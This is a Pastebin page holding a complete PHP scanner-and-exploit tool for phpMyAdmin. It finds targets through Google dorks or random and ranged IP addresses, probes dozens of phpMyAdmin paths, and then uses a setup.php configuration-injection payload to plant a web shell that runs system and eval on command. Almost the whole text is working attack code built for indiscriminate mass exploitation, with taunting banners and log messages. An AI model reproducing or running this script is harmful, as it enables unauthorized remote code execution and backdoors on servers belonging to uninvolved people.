API tools faq
paste
Advertisement
Gh05t666include

(scanner) PHP my admin code

Gh05t666include
Jul 21st, 2020
95
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 14.90 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2.  
  3. error_reporting(0);
  4. set_time_limit(0);
  5. ini_set('memory_limit', '256M');
  6. ini_set('display_errors', 0);
  7. ini_set('max_execution_time', 0);
  8. ini_set('allow_url_fopen', 1);
  9. /*
  10. * ***************************************************************
  11. Fucking ur mom by indoghostsec
  12.  
  13. Anonroz team , Banyuwangi blackhat , Silent X team , Anonymous all Indonesia , AnonID , AnonPL , Anonghost
  14. * ***************************************************************
  15.  
  16. EDITADO POR GoogleINURL
  17. blog.inurl.com.br
  18. */
  19.  
  20.  
  21. $list = array(
  22. '/phpmyadmin/',
  23. '/phpMyAdmin/',
  24. '/PMA/',
  25. '/pma/',
  26. '/admin/',
  27. '/dbadmin/',
  28. '/mysql/',
  29. '/myadmin/',
  30. '/phpmyadmin2/',
  31. '/phpMyAdmin2/',
  32. '/phpMyAdmin-2/',
  33. '/php-my-admin/',
  34. '/phpMyAdmin-2.2.3/',
  35. '/phpMyAdmin-2.2.6/',
  36. '/phpMyAdmin-2.5.1/',
  37. '/phpMyAdmin-2.5.4/',
  38. '/phpMyAdmin-2.5.5-rc1/',
  39. '/phpMyAdmin-2.5.5-rc2/',
  40. '/phpMyAdmin-2.5.5/',
  41. '/phpMyAdmin-2.5.5-pl1/',
  42. '/phpMyAdmin-2.5.6-rc1/',
  43. '/phpMyAdmin-2.5.6-rc2/',
  44. '/phpMyAdmin-2.5.6/',
  45. '/phpMyAdmin-2.5.7/',
  46. '/phpMyAdmin-2.5.7-pl1/',
  47. '/phpMyAdmin-2.6.0-alpha/',
  48. '/phpMyAdmin-2.6.0-alpha2/',
  49. '/phpMyAdmin-2.6.0-beta1/',
  50. '/phpMyAdmin-2.6.0-beta2/',
  51. '/phpMyAdmin-2.6.0-rc1/',
  52. '/phpMyAdmin-2.6.0-rc2/',
  53. '/phpMyAdmin-2.6.0-rc3/',
  54. '/phpMyAdmin-2.6.0/',
  55. '/phpMyAdmin-2.6.0-pl1/',
  56. '/phpMyAdmin-2.6.0-pl2/',
  57. '/phpMyAdmin-2.6.0-pl3/',
  58. '/phpMyAdmin-2.6.1-rc1/',
  59. '/phpMyAdmin-2.6.1-rc2/',
  60. '/phpMyAdmin-2.6.1/',
  61. '/phpMyAdmin-2.6.1-pl1/',
  62. '/phpMyAdmin-2.6.1-pl2/',
  63. '/phpMyAdmin-2.6.1-pl3/',
  64. '/phpMyAdmin-2.6.2-rc1/',
  65. '/phpMyAdmin-2.6.2-beta1/',
  66. '/phpMyAdmin-2.6.2-rc1/',
  67. '/phpMyAdmin-2.6.2/',
  68. '/phpMyAdmin-2.6.2-pl1/',
  69. '/phpMyAdmin-2.6.3/',
  70. '/phpMyAdmin-2.6.3-rc1/',
  71. '/phpMyAdmin-2.6.3/',
  72. '/phpMyAdmin-2.6.3-pl1/',
  73. '/phpMyAdmin-2.6.4-rc1/',
  74. '/phpMyAdmin-2.6.4-pl1/',
  75. '/phpMyAdmin-2.6.4-pl2/',
  76. '/phpMyAdmin-2.6.4-pl3/',
  77. '/phpMyAdmin-2.6.4-pl4/',
  78. '/phpMyAdmin-2.6.4/',
  79. '/phpMyAdmin-2.7.0-beta1/',
  80. '/phpMyAdmin-2.7.0-rc1/',
  81. '/phpMyAdmin-2.7.0-pl1/',
  82. '/phpMyAdmin-2.7.0-pl2/',
  83. '/phpMyAdmin-2.7.0/',
  84. '/phpMyAdmin-2.8.0-beta1/',
  85. '/phpMyAdmin-2.8.0-rc1/',
  86. '/phpMyAdmin-2.8.0-rc2/',
  87. '/phpMyAdmin-2.8.0/',
  88. '/phpMyAdmin-2.8.0.1/',
  89. '/phpMyAdmin-2.8.0.2/',
  90. '/phpMyAdmin-2.8.0.3/',
  91. '/phpMyAdmin-2.8.0.4/',
  92. '/phpMyAdmin-2.8.1-rc1/',
  93. '/phpMyAdmin-2.8.1/',
  94. '/phpMyAdmin-2.8.2/',
  95. '/sqlmanager/',
  96. '/mysqlmanager/',
  97. '/p/m/a/',
  98. '/PMA2005/',
  99. '/pma2005/',
  100. '/phpmanager/',
  101. '/php-myadmin/',
  102. '/phpmy-admin/',
  103. '/webadmin/',
  104. '/sqlweb/',
  105. '/websql/',
  106. '/webdb/',
  107. '/mysqladmin/',
  108. '/mysql-admin/',
  109. );
  110.  
  111. function filterHost($array = array()) {
  112. if (!empty($array)) {
  113. foreach ($array as $value) {
  114. $real = parse_url("http://{$value}");
  115. $_[] = "http://" . $real['host'];
  116. }
  117.  
  118. return array_filter(array_unique($_));
  119. } else {
  120.  
  121. return NULL;
  122. }
  123. }
  124.  
  125. ################################################################################
  126. #GENERATOR RANGE IP#############################################################
  127. ################################################################################
  128.  
  129. function __generatorRangeIP($range) {
  130.  
  131. $ip_ = explode(',', $range);
  132. if (is_array($ip_)) {
  133.  
  134. $_ = array(0 => ip2long($ip_[0]), 1 => ip2long($ip_[1]));
  135. while ($_[0] <= $_[1]) {
  136.  
  137. $ips[] = "http://" . long2ip($_[0]);
  138. $_[0] ++;
  139. }
  140. } else {
  141.  
  142. return FALSE;
  143. }
  144.  
  145. return $ips;
  146. }
  147.  
  148. ################################################################################
  149. #GENERATOR RANGE IP RANDOM######################################################
  150. ################################################################################
  151.  
  152. function __generatorIPRandom($cont) {
  153.  
  154. $cont[0] = 0;
  155. while ($cont[0] < $cont[1]) {
  156.  
  157. $bloc[0] = rand(0, 255);
  158. $bloc[1] = rand(0, 255);
  159. $bloc[2] = rand(0, 255);
  160. $bloc[3] = rand(0, 255);
  161. $ip[] = "http://{$bloc[0]}.{$bloc[1]}.{$bloc[2]}.{$bloc[3]}";
  162.  
  163. $cont[0] ++;
  164. }
  165. return array_unique($ip);
  166. }
  167.  
  168. $banner = "
  169. \t---------------------------------------------------------------
  170. \t phpMyAdmin Code Injection RCE Scanner & Exploit
  171. \t This is PHP version original http://milw0rm.com/exploits/8921
  172. \t Edited by GoogleINURL - http://blog.inurl.com.br
  173. \t---------------------------------------------------------------
  174. \n";
  175.  
  176. if ($argc > 1) {
  177. print $banner;
  178. print "Usage: php $argv[0] \n";
  179. exit;
  180. }
  181.  
  182. print $banner;
  183. print "\n";
  184. $Handlex = FOpen("pmaPWN.log", "a+");
  185. FWrite($Handlex, $banner);
  186.  
  187. print "[-] Master, where you want to go today? \n";
  188. print "[-] OPTIONS: \n";
  189. print "---------------------------------------------------------------------\n";
  190. print "[+] DORKING: [ 1 ]\n";
  191. print "[+] RANGE IP: [ 2 ]\n";
  192. print "[+] RANGE IP RANDOM: [ 3 ]\n";
  193. print "[+] VALUES FILE: [ 4 ]\n";
  194. print "---------------------------------------------------------------------\n";
  195. fwrite(STDOUT, "\nGoogleINURL@scan:/options# ");
  196. $op = trim(fgets(STDIN));
  197.  
  198. if ($op == 1) {
  199. print "[-] example: intitle:phpMyAdmin\n";
  200. fwrite(STDOUT, "GoogleINURL@scan:/options/set_dork# ");
  201. $dork = urlencode(trim(fgets(STDIN)));
  202. print "\n[!] QUERY: SELECT * FROM `googledb` WHERE `keyword` = '$dork'\n";
  203. FWrite($Handlex, "[!] QUERY: SELECT * FROM `googledb` WHERE `keyword` = '$dork'\n");
  204. //for($i = 0; $i <= 2; $i+=100) {
  205. $ch = curl_init();
  206. curl_setopt($ch, CURLOPT_URL, "https://www.google.com.br/search?q=$dork&num=1500&btnG=Search&pws=1");
  207. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  208. curl_setopt($ch, CURLOPT_TIMEOUT, 200);
  209. curl_setopt($ch, CURLOPT_HEADER, 1);
  210. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  211. curl_setopt($ch, CURLOPT_REFERER, "http://google.com");
  212. curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9');
  213. $pg = curl_exec($ch);
  214. curl_close($ch);
  215.  
  216. # MODIFICADO MOTOR DE BUSCA E REG DE VALIDAÇÃO BY GoogleINURL - 26/jun/2015
  217. $html = str_replace('href="/url?q=', 'href="', $pg);
  218. $html = str_replace('https://www.google.com.br', '', $html);
  219. $html = str_replace('http://www.phpmyadmin.net', '', $html);
  220.  
  221. preg_match_all("#(<h3 class=\"r\"><a href=\"http[s]?://(.*?)\">)#si", $html, $links);
  222. $_ = array_filter(array_unique($links[2]));
  223.  
  224. //if (preg_match_all($reg, $html, $links)) { $res[] = $links[2]; }
  225. //}
  226. $res = filterHost($_);
  227. }
  228.  
  229. if ($op == 2) {
  230. print "\n[-] example: 200.107.69.1,200.107.69.255 \n";
  231. fwrite(STDOUT, "GoogleINURL@scan:/options/set_range# ");
  232. $value = (trim(fgets(STDIN)));
  233. $res = __generatorRangeIP($value);
  234. }
  235.  
  236. if ($op == 3) {
  237. print "\n[-] Amount of IPS / example: 255 \n";
  238. fwrite(STDOUT, "GoogleINURL@scan:/options/set_range_rand# ");
  239. $value = (trim(fgets(STDIN)));
  240. $res = __generatorIPRandom(array([0] => 0, 1 => $value));
  241. }
  242.  
  243. if ($op == 4) {
  244. print "[-] example: hosts.txt ";
  245. fwrite(STDOUT, "\nGoogleINURL@scan:/options/set_file# ");
  246. $value = (trim(fgets(STDIN)));
  247. $res = array_unique(array_filter(explode("\n", file_get_contents($value))));
  248. }
  249.  
  250.  
  251.  
  252. (!isset($res) && empty($res) ? exit("\n[x] ERRO SEM RESULTADOS\n") : NULL);
  253. print "---------------------------------------------------------------------\n";
  254. $total = count($res);
  255. print "\n[+] Done. $total rows return.\n";
  256. FWrite($Handlex, "[+] Done. $total rows return.\n");
  257. FClose($Handlex);
  258.  
  259. // foreach($res as $key) {
  260. $cont = 1;
  261. foreach ($res as $url) {
  262.  
  263. $Handlex = FOpen("pmaPWN.log", "a+");
  264. //$real = parse_url("http://{$target}");
  265. //$url = "http://" . $real['host'];
  266. print "\n[ {$cont} / {$total} ][-] Scanning phpMyAdmin on " . $url . "\n";
  267. $cont++;
  268. FWrite($Handlex, "\n[-] Scanning phpMyAdmin on " . $url . "\n");
  269. FClose($Handlex);
  270. sleep(5);
  271. $curlHandle = curl_multi_init();
  272. for ($i = 0; $i < count($list); $i++)
  273. $curl[$i] = addHandle($curlHandle, $url . $list[$i]);
  274. ExecHandle($curlHandle);
  275. for ($i = 0; $i < count($list); $i++) {
  276. $text[$i] = curl_multi_getcontent($curl[$i]);
  277. //echo $url.$list[$i]."\n";
  278. $Handlex = FOpen("pmaPWN.log", "a+");
  279. if (preg_match("/<title>phpMyAdmin/", $text[$i]) or preg_match("/<title>Access denied/", $text[$i]) and preg_match("/phpMyAdmin/", $text[$i])) {
  280. print "\n[!] w00t! w00t! Found phpMyAdmin [ " . $url . $list[$i] . " ]";
  281. print "\n[+] Testing vulnerable, wait sec..\n";
  282. FWrite($Handlex, "\n[!] w00t! w00t! Found phpMyAdmin [ " . $url . $list[$i] . " ]");
  283. FWrite($Handlex, "\n[+] Testing vulnerable, wait sec..\n");
  284. if (preg_match("/phpMyAdmin is more friendly with a/", $text[$i])) {
  285. print "\n[!] w00t! w00t! NO PASSWD --> [ " . $url . $list[$i] . " ]\n";
  286. FWrite($Handlex, "\n[!] w00t! w00t! NO PASSWD --> [ " . $url . $list[$i] . " ]\n");
  287. }
  288. FClose($Handlex);
  289. exploit_site($url . $list[$i]);
  290. }
  291. }
  292. for ($i = 0; $i < count($list); $i++)//remove the handles
  293. curl_multi_remove_handle($curlHandle, $curl[$i]);
  294. curl_multi_close($curlHandle);
  295. sleep(5);
  296. }
  297.  
  298. // }
  299.  
  300. function addHandle(&$curlHandle, $url) {
  301. $cURL = curl_init();
  302. curl_setopt($cURL, CURLOPT_URL, $url);
  303. curl_setopt($cURL, CURLOPT_HEADER, 0);
  304. curl_setopt($cURL, CURLOPT_RETURNTRANSFER, 1);
  305. curl_setopt($cURL, CURLOPT_TIMEOUT, 10);
  306. curl_setopt($cURL, CURLOPT_CONNECTTIMEOUT, 10);
  307. curl_multi_add_handle($curlHandle, $cURL);
  308. return $cURL;
  309. }
  310.  
  311. //execute the handle until the flag passed
  312. // to function is greater then 0
  313. function ExecHandle(&$curlHandle) {
  314. $flag = null;
  315. do {
  316. //fetch pages in parallel
  317. curl_multi_exec($curlHandle, $flag);
  318. } while ($flag > 0);
  319. }
  320.  
  321. function exploit_site($url) {
  322. $ch = curl_init();
  323. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  324. curl_setopt($ch, CURLOPT_HEADER, 1);
  325. curl_setopt($ch, CURLOPT_TIMEOUT, 100);
  326. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 20);
  327. curl_setopt($ch, CURLOPT_URL, $url . "scripts/setup.php");
  328. $result = curl_exec($ch);
  329. curl_close($ch);
  330. $ch2 = curl_init();
  331. curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1);
  332. curl_setopt($ch, CURLOPT_TIMEOUT, 100);
  333. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 20);
  334. curl_setopt($ch2, CURLOPT_URL, $url . "config/config.inc.php");
  335. $result2 = curl_exec($ch2);
  336. curl_close($ch2);
  337. //print $url;
  338. if (preg_match("/200 OK/", $result) and preg_match("/token/", $result) and preg_match("/200 OK/", $result2)) {
  339. print "\n[!] w00t! w00t! Found possible phpMyAdmin vuln";
  340. print "\n[+] Exploiting, wait sec..\n";
  341. $Handlex = FOpen("pmaPWN.log", "a+");
  342. FWrite($Handlex, "\n[!] w00t! w00t! Found possible phpMyAdmin vuln");
  343. FWrite($Handlex, "\n[+] Exploiting, wait sec..\n");
  344. FClose($Handlex);
  345. exploit($url);
  346. } else {
  347. $Handlex = FOpen("pmaPWN.log", "a+");
  348. print "\n[-] Shit! no luck.. not vulnerable\n";
  349. FWrite($Handlex, "\n[-] Shit! no luck.. not vulnerable\n");
  350. FClose($Handlex);
  351. }
  352. }
  353.  
  354. function exploit($w00t) {
  355. $Handlex = FOpen("pmaPWN.log", "a+");
  356. $useragent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729) "; //firefox
  357. //first get cookie + token
  358. $curl = curl_init();
  359. curl_setopt($curl, CURLOPT_URL, $w00t . "scripts/setup.php"); //URL
  360. curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
  361. curl_setopt($curl, CURLOPT_USERAGENT, $useragent);
  362. curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
  363. curl_setopt($curl, CURLOPT_TIMEOUT, 100);
  364. curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
  365. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
  366. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
  367. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); //return site as string
  368. curl_setopt($curl, CURLOPT_COOKIEFILE, "exploitcookie.txt");
  369. curl_setopt($curl, CURLOPT_COOKIEJAR, "exploitcookie.txt");
  370. $result = curl_exec($curl);
  371. curl_close($curl);
  372. if (preg_match_all("/token\"\s+value=\"([^>]+?)\"/", $result, $matches))
  373. ;
  374.  
  375. $token = $matches[1][1];
  376. if ($token != '') {
  377. print "\n[!] w00t! w00t! Got token = " . $matches[1][1];
  378. FWrite($Handlex, "\n[!] w00t! w00t! Got token = " . $matches[1][1]);
  379. $payload = "token=" . $token . "&action=save&configuration=a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%27%5d=%27%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20%27%3cpre%3e%27%3bsystem(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}if(\$_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3beval(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix";
  380. print "\n[+] Sending evil payload mwahaha.. \n";
  381. FWrite($Handlex, "\n[+] Sending evil payload mwahaha.. \n");
  382. $curl = curl_init();
  383. curl_setopt($curl, CURLOPT_URL, $w00t . "scripts/setup.php");
  384. curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
  385. curl_setopt($curl, CURLOPT_TIMEOUT, 200);
  386. curl_setopt($curl, CURLOPT_USERAGENT, $useragent);
  387. curl_setopt($curl, CURLOPT_REFERER, $w00t);
  388. curl_setopt($curl, CURLOPT_POST, true);
  389. curl_setopt($curl, CURLOPT_POSTFIELDS, $payload);
  390. curl_setopt($curl, CURLOPT_COOKIEFILE, "exploitcookie.txt");
  391. curl_setopt($curl, CURLOPT_COOKIEJAR, "exploitcookie.txt");
  392. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 3);
  393. curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
  394. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  395. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
  396. $result = curl_exec($curl);
  397. curl_close($curl);
  398.  
  399. print "\n[!] w00t! w00t! You should now have shell here";
  400. print "\n[+] " . $w00t . "config/config.inc.php?c=id \n";
  401. print "\n[!] Saved. Dont forget to check `pmaPWN.log`\n";
  402. FWrite($Handlex, "\n[!] w00t! w00t! You should now have shell here");
  403. FWrite($Handlex, "\n[+] " . $w00t . "config/config.inc.php?c=id \n");
  404. } else {
  405. print "\n[!] Shit! no luck.. not vulnerable\n";
  406. FWrite($Handlex, "\n[!] Shit! no luck.. not vulnerable\n");
  407. return false;
  408. }
  409. FClose($Handlex);
  410. if (file_exists('exploitcookie.txt')) {
  411. unlink('exploitcookie.txt');
  412. }
  413. //exit();
  414. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!